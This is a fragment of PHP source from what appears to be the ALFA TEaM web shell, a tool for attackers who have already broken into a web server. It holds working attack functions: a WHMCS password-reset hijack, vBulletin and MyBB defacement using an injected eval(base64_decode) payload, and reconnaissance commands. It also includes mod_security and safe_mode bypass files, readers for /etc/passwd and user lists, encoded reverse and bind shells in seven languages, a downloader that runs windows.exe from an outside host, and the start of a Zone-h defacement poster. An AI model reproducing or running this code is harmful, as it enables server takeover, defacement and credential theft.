$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace("'","\'",$tempSave1);
$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists('curl_version')){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path."/pwreset.php");
$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert('File Created...');
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
}else{
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
}}}}
if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
echo __pre();

echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
<input type='submit' value=' '></form></center></center>";
if($_POST['alfa8']=='>>'){
$s0levisible="Powered By Solevisible";
$dbu = $_POST['alfa2'];
$dbn = $_POST['alfa3'];
$dbp = $_POST['alfa4'];
$dbh = $_POST['alfa5'];
$index = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}";
if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
__alert('VB index changed...!');
}
}
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
echo __pre();

echo "<center><center><div class='txtfont_header'>| Mybb |</div>
<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name=mybbindex rows='19' cols='103'>
<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
if(isset($_POST['alfa6'])){
$mybb_dbh = $_POST['alfa6'];
$mybb_dbu = $_POST['alfa7'];
$mybb_dbn = $_POST['alfa8'];
$mybb_dbp = $_POST['alfa9'];
$mybb_index = $_POST['alfa10'];
if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
$prefix="mybb_";
$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
__alert('MyBB index changed...!');
}
}
}
echo "</div>";
alfafooter();
}
function alfaproc()
{
alfahead();
echo "<Div class=header><br><center>";
if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
if($GLOBALS['sys']=="win"){
$process=array(
"Task List" =>"tasklist /V",
"System Info" =>"systeminfo",
"Active Connections" => "netstat -an",
"Running Services" => "net start",
"User Accounts" => "net user",
"Show Computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);}else{
$process=array(
"Process status" => "ps aux",
"Syslog" =>"cat /etc/syslog.conf",
"Resolv" => "cat /etc/resolv.conf",
"Hosts" =>"cat /etc/hosts",
"Cpuinfo"=>"cat /proc/cpuinfo",
"Version"=>"cat /proc/version",
"Sbin"=>"ls -al /usr/sbin",
"Interrupts"=>"cat /proc/interrupts",
"lsattr"=>"lsattr -va",
"Uptime"=>"uptime",
"Fstab" =>"cat /etc/fstab"
);}
foreach($process as $n => $link){
echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
}
echo "</center><br>";
if(!empty($_POST['alfa1'])){
echo "<pre class='ml1' style='margin-top:5px' >";
if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
echo alfaEx($cmd.$_POST['alfa1']);
echo '</pre>';
}
echo "</div>";
alfafooter();
}
function alfasafe(){
alfahead();
echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
echo __pre();
$solevisible9 = _alfa_file('/etc/named.conf');
if(is_array($solevisible9)){
foreach($solevisible9 as $solevisible13){
if(@eregi('zone',$solevisible13)){
preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
if(strlen(trim($solevisible14[1][0])) > 2){
echo $solevisible14[1][0].'<br>';
}}}
}
}else{
echo __pre();
$users = _alfa_file("/etc/virtual/domainowners");
if(is_array($users)){
foreach($users as $boz){
$dom = explode(":",$boz);
echo $dom[0]."\n";}}}}
if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
echo '
<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
$site = trim($_POST['alfa7']);
$rep = str_replace(array("https://","http://","www."),"",$site);
$user = "";
if(function_exists("posix_getpwuid") && function_exists("fileowner")){
	if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
		$user = $user['name'];
	}
}else{
	if(_alfa_can_runCommand(true,true)){
		$user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
	}
}
if(!empty($user)&&$user!='root'){
echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
}else{
$site = trim($_POST['alfa7']);
$rep = str_replace(array("https://","http://","www."),"",$site);
$users = _alfa_file("/etc/virtual/domainowners");
foreach($users as $boz){
$ex = explode(":",$boz);
if($ex[0] == $rep){
echo __pre()."<center><table border='1'>
<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
echo __pre();
$i = 0;
while ($i < 60000) {
$line = @posix_getpwuid($i);
if (!empty($line)) {
while (list ($key, $vl) = each($line)){
echo $vl."\n";
break;}}$i++;}
}else{echo __pre();
$users = _alfa_file("/etc/virtual/domainowners");
foreach($users as $boz){
$user = explode(":",$boz);
echo trim($user[1]).'<br>';}}}
if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
echo __pre();
if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
for($uid=0;$uid<60000;$uid++){
$ara = @posix_getpwuid($uid);
if(!empty($ara)){
while(list ($key, $val) = each($ara)){
echo "$val:";
}echo "\n";}}
}else{__alert('failed...');}}
if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
}
if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
echo '<center><b><big> php.ini created...!</center></b></big>';
}
if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
}
echo "<br></div>";
alfafooter();
}
function __get_resource($content){
return @gzinflate(__ZGVjb2Rlcg($content));
}
function __write_file($file, $content){
if($fh = @fopen($file, "wb")){
if(fwrite($fh, $content)!==false) return true;
}
return false;
}
function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
$res = "<font color='green'>[ Success...! ]</font>";
$err = "<font color='red'>[ Failed...! ]</font>";
if($evalOptions!="") $evalOptions = $evalOptions." ";
if($evalArguments!="") $evalArguments = " ".$evalArguments;
if($evalType=="c"){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq.".c";
$path = $filename;
if(__write_file($path, $evalCode)){
$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
$pathres = $filename.$ext;
$evalOptions = "-o ".$pathres." ".$evalOptions;
$cmd = "gcc ".$evalOptions.$path;
alfaEx($cmd);
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = $pathres.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}elseif($evalType=="java"){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
$classname = trim($r[1]);
$filename = $classname;
}else{
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq;
$evalCode = "class ".$filename." { ".$evalCode . " } ";
}
$path = $filename.".java";
if(__write_file($path, $evalCode)){
$cmd = "javac ".$evalOptions.$path;
alfaEx($cmd);
$pathres = $filename.".class";
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = "java ".$filename.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}
return false;
}
function alfaconnect(){
alfahead();
$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
$lang = $_POST['alfa1'];
$ip = $_POST['alfa2'];
$port = $_POST['alfa3'];
$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
$tmpdir = ALFA_TEMPDIR;
$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
$allow = array('perl','ruby','python','node');
eval('$lan=$'.$lang.';');
if(in_array($lang,$allow)){
if(__write_file($name,__get_resource($lan))){
if(_alfa_can_runCommand(true,true)){
$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
$out = alfaEx("$lang $name $arg $os");
if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
}
}else{
echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
}
}
if($lang=='java'||$lang=='c'){
$code = __get_resource($lan);
$out = nl2br(bcinit($lang, $code,'',''));
echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
}
if($lang=='bcwin'){
$alfa = new AlfaCURL();
$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
$tmpdir = ALFA_TEMPDIR;
$f = @fopen($tmpdir.'/bcwin.exe','w+');
@fwrite($f, $s);
@fclose($f);
$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
}
if($lang=='php'){
echo "<pre class=ml1 style='margin-top:5px'>";
$code = __get_resource($lan);
if($code!==false){
$code = "\$target = \"".$arg."\";\n".$code;
eval($code);
echo("<center><font color='green'>[ Finished...! ]</font></center>");
}
echo "</pre>";
}
}
echo "</div>";
alfafooter();
}
function alfazoneh(){
alfahead();
echo '<div class=header>';
if(!function_exists('curl_version')){
echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
}
$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
echo '
<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
